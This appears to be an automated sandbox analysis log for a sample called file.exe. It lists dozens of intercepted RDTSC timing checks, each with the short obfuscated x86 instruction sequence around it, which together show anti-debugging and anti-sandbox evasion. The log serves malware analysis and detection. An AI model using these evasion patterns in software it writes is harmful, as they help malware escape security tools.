                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10518F8 second address: 1051910 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F1F50F77976h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 je 00007F1F50F77976h 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1051910 second address: 105191C instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 je 00007F1F50CBBC36h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1052455 second address: 105246E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 je 00007F1F50F77976h 0x0000000c popad 0x0000000d jmp 00007F1F50F7797Ch 0x00000012 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1067675 second address: 1067688 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F1F50CBBC36h 0x0000000a popad 0x0000000b push edi 0x0000000c jng 00007F1F50CBBC36h 0x00000012 pop edi 0x00000013 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1067688 second address: 106769F instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jl 00007F1F50F77976h 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 jp 00007F1F50F77976h 0x00000017 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 106769F second address: 10676A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1069E5A second address: 1069E64 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 popad 0x00000009 pop eax 0x0000000a rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1069E64 second address: 1069E69 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1069CAA second address: 1069CBB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1F50F7797Dh 0x00000009 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1069CBB second address: 1069CBF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1069CBF second address: 1069CEF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F1F50F77989h 0x0000000b pop edx 0x0000000c pop eax 0x0000000d jnp 00007F1F50F77991h 0x00000013 push edi 0x00000014 jo 00007F1F50F77976h 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 106440F second address: 1064415 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1079DC1 second address: 1079DC7 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1079DC7 second address: 1079DDD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F50CBBC3Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1079DDD second address: 1079DE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1079DE3 second address: 1079E03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F1F50CBBC48h 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1092DBE second address: 1092DCA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 push esi 0x00000007 pushad 0x00000008 push eax 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1092DCA second address: 1092DEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F1F50CBBC49h 0x0000000e rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1092141 second address: 1092145 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1092145 second address: 1092149 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1092149 second address: 1092151 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1092151 second address: 1092171 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1F50CBBC46h 0x00000009 jg 00007F1F50CBBC36h 0x0000000f rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1092171 second address: 109217F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jno 00007F1F50F77976h 0x0000000e rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1092733 second address: 1092739 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1092739 second address: 109273D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 109273D second address: 1092741 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1097451 second address: 1097455 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1097455 second address: 109745B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 109745B second address: 109748C instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jnl 00007F1F50F77976h 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f mov dword ptr [ebp+1247C696h], edi 0x00000015 push dword ptr [ebp+122D1B62h] 0x0000001b mov dx, A108h 0x0000001f call 00007F1F50F77979h 0x00000024 pushad 0x00000025 push eax 0x00000026 push edx 0x00000027 jp 00007F1F50F77976h 0x0000002d rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 109748C second address: 10974A7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F1F50CBBC43h 0x0000000d rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10974A7 second address: 10974C3 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F1F50F77976h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F1F50F7797Dh 0x00000014 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10974C3 second address: 10974C7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10974C7 second address: 109750E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F1F50F7797Bh 0x0000000b popad 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 pushad 0x00000011 push ecx 0x00000012 jmp 00007F1F50F7797Ch 0x00000017 pop ecx 0x00000018 jmp 00007F1F50F77981h 0x0000001d popad 0x0000001e mov eax, dword ptr [eax] 0x00000020 js 00007F1F50F77982h 0x00000026 je 00007F1F50F7797Ch 0x0000002c push eax 0x0000002d push edx 0x0000002e rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1098ED8 second address: 1098EF4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F50CBBC3Ah 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e pushad 0x0000000f popad 0x00000010 jbe 00007F1F50CBBC36h 0x00000016 popad 0x00000017 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1098EF4 second address: 1098F05 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1F50F7797Bh 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1098F05 second address: 1098F09 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 109AAB6 second address: 109AAD3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F50F77989h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 109AAD3 second address: 109AAE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jbe 00007F1F50CBBC36h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53B0DAA second address: 53B0DAF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53A0B47 second address: 53A0B56 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F50CBBC3Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53A0B56 second address: 53A0BC2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F50F77989h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F1F50F77981h 0x0000000f xchg eax, ebp 0x00000010 jmp 00007F1F50F7797Eh 0x00000015 mov ebp, esp 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a mov al, bl 0x0000001c pushfd 0x0000001d jmp 00007F1F50F77986h 0x00000022 sub ch, 00000018h 0x00000025 jmp 00007F1F50F7797Bh 0x0000002a popfd 0x0000002b popad 0x0000002c rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53A0BC2 second address: 53A0BF7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F1F50CBBC3Fh 0x00000009 add ecx, 724F00DEh 0x0000000f jmp 00007F1F50CBBC49h 0x00000014 popfd 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53E0B6E second address: 53E0BEC instructions: 0x00000000 rdtsc 0x00000002 mov di, B3F4h 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 push ecx 0x0000000a pushad 0x0000000b mov bl, ch 0x0000000d push ebx 0x0000000e movzx esi, di 0x00000011 pop edi 0x00000012 popad 0x00000013 mov dword ptr [esp], ebp 0x00000016 pushad 0x00000017 pushfd 0x00000018 jmp 00007F1F50F77984h 0x0000001d xor cl, FFFFFFD8h 0x00000020 jmp 00007F1F50F7797Bh 0x00000025 popfd 0x00000026 mov edi, esi 0x00000028 popad 0x00000029 mov ebp, esp 0x0000002b jmp 00007F1F50F77982h 0x00000030 pop ebp 0x00000031 pushad 0x00000032 pushfd 0x00000033 jmp 00007F1F50F7797Eh 0x00000038 jmp 00007F1F50F77985h 0x0000003d popfd 0x0000003e push eax 0x0000003f push edx 0x00000040 mov bx, cx 0x00000043 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53800D8 second address: 53800DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53800DC second address: 5380113 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 call 00007F1F50F77986h 0x0000000b jmp 00007F1F50F77982h 0x00000010 pop ecx 0x00000011 popad 0x00000012 push ebp 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5380113 second address: 5380126 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F50CBBC3Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5380126 second address: 538019E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F50F77989h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ebp 0x0000000c jmp 00007F1F50F7797Eh 0x00000011 mov ebp, esp 0x00000013 pushad 0x00000014 movzx eax, bx 0x00000017 pushfd 0x00000018 jmp 00007F1F50F77983h 0x0000001d sub cl, FFFFFFAEh 0x00000020 jmp 00007F1F50F77989h 0x00000025 popfd 0x00000026 popad 0x00000027 push dword ptr [ebp+04h] 0x0000002a push eax 0x0000002b push edx 0x0000002c jmp 00007F1F50F7797Dh 0x00000031 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 538019E second address: 53801D9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop edi 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push dword ptr [ebp+0Ch] 0x0000000b jmp 00007F1F50CBBC44h 0x00000010 push dword ptr [ebp+08h] 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F1F50CBBC47h 0x0000001a rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53801D9 second address: 53801DF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53A0956 second address: 53A0966 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov di, 0B8Ah 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ebp 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53A0966 second address: 53A096D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov ecx, ebx 0x00000006 popad 0x00000007 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53A096D second address: 53A0973 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53A0973 second address: 53A0977 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53A0977 second address: 53A097B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53A0550 second address: 53A0575 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F50F77981h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F1F50F7797Dh 0x00000011 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53A0484 second address: 53A04A1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F50CBBC49h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53A022B second address: 53A0231 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53A0231 second address: 53A0235 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53A0235 second address: 53A0285 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F1F50F77982h 0x0000000e xchg eax, ebp 0x0000000f pushad 0x00000010 mov ah, bl 0x00000012 popad 0x00000013 mov ebp, esp 0x00000015 jmp 00007F1F50F77984h 0x0000001a pop ebp 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e pushad 0x0000001f popad 0x00000020 jmp 00007F1F50F77983h 0x00000025 popad 0x00000026 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53A0285 second address: 53A028B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53A028B second address: 53A028F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53B0008 second address: 53B000C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53B000C second address: 53B0012 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53B0012 second address: 53B0039 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F50CBBC3Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F1F50CBBC45h 0x00000011 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53B0039 second address: 53B0070 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushfd 0x00000006 jmp 00007F1F50F7797Dh 0x0000000b xor esi, 6F179A96h 0x00000011 jmp 00007F1F50F77981h 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a push eax 0x0000001b pushad 0x0000001c push eax 0x0000001d push edx 0x0000001e mov edx, 05D257A0h 0x00000023 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53B0070 second address: 53B00E2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F50CBBC49h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushfd 0x0000000a jmp 00007F1F50CBBC40h 0x0000000f add ax, B518h 0x00000014 jmp 00007F1F50CBBC3Bh 0x00000019 popfd 0x0000001a popad 0x0000001b xchg eax, ebp 0x0000001c jmp 00007F1F50CBBC46h 0x00000021 mov ebp, esp 0x00000023 push eax 0x00000024 push edx 0x00000025 jmp 00007F1F50CBBC47h 0x0000002a rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53B00E2 second address: 53B00E8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53B00E8 second address: 53B013A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F50CBBC3Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f mov di, 5AC6h 0x00000013 pushfd 0x00000014 jmp 00007F1F50CBBC47h 0x00000019 add esi, 0E65C94Eh 0x0000001f jmp 00007F1F50CBBC49h 0x00000024 popfd 0x00000025 popad 0x00000026 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53E0A94 second address: 53E0A9A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53E0A9A second address: 53E0A9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53E0A9E second address: 53E0B3F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F50F77987h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c jmp 00007F1F50F77986h 0x00000011 mov ebp, esp 0x00000013 pushad 0x00000014 pushfd 0x00000015 jmp 00007F1F50F7797Eh 0x0000001a jmp 00007F1F50F77985h 0x0000001f popfd 0x00000020 push esi 0x00000021 call 00007F1F50F77987h 0x00000026 pop ecx 0x00000027 pop edi 0x00000028 popad 0x00000029 pop ebp 0x0000002a pushad 0x0000002b pushfd 0x0000002c jmp 00007F1F50F77982h 0x00000031 sbb ax, D1B8h 0x00000036 jmp 00007F1F50F7797Bh 0x0000003b popfd 0x0000003c push eax 0x0000003d push edx 0x0000003e mov cl, ABh 0x00000040 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53C00BE second address: 53C00C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53C00C2 second address: 53C00C8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53C00C8 second address: 53C00CF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53C00CF second address: 53C00E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b mov edi, 53732D8Ch 0x00000010 mov dl, 96h 0x00000012 popad 0x00000013 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53C00E2 second address: 53C0114 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F1F50CBBC43h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov dword ptr [esp], ebp 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F1F50CBBC40h 0x00000019 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53C0114 second address: 53C0118 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53C0118 second address: 53C011E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53C011E second address: 53C0177 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F1F50F7797Ch 0x00000009 sbb cl, 00000038h 0x0000000c jmp 00007F1F50F7797Bh 0x00000011 popfd 0x00000012 pushad 0x00000013 popad 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 mov ebp, esp 0x00000019 jmp 00007F1F50F77984h 0x0000001e mov eax, dword ptr [ebp+08h] 0x00000021 push eax 0x00000022 push edx 0x00000023 pushad 0x00000024 jmp 00007F1F50F77988h 0x00000029 popad 0x0000002a rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53C0177 second address: 53C017D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53C017D second address: 53C0181 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53C0181 second address: 53C0185 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53C0185 second address: 53C01CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 and dword ptr [eax], 00000000h 0x0000000b jmp 00007F1F50F77989h 0x00000010 and dword ptr [eax+04h], 00000000h 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 pushfd 0x00000018 jmp 00007F1F50F7797Ah 0x0000001d xor cl, FFFFFF88h 0x00000020 jmp 00007F1F50F7797Bh 0x00000025 popfd 0x00000026 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53A036C second address: 53A03F5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F1F50CBBC47h 0x00000008 pop eax 0x00000009 pushfd 0x0000000a jmp 00007F1F50CBBC49h 0x0000000f jmp 00007F1F50CBBC3Bh 0x00000014 popfd 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 xchg eax, ebp 0x00000019 pushad 0x0000001a pushfd 0x0000001b jmp 00007F1F50CBBC44h 0x00000020 xor cx, C638h 0x00000025 jmp 00007F1F50CBBC3Bh 0x0000002a popfd 0x0000002b push esi 0x0000002c pop ecx 0x0000002d popad 0x0000002e push eax 0x0000002f push eax 0x00000030 push edx 0x00000031 pushad 0x00000032 pushad 0x00000033 popad 0x00000034 jmp 00007F1F50CBBC43h 0x00000039 popad 0x0000003a rdtsc
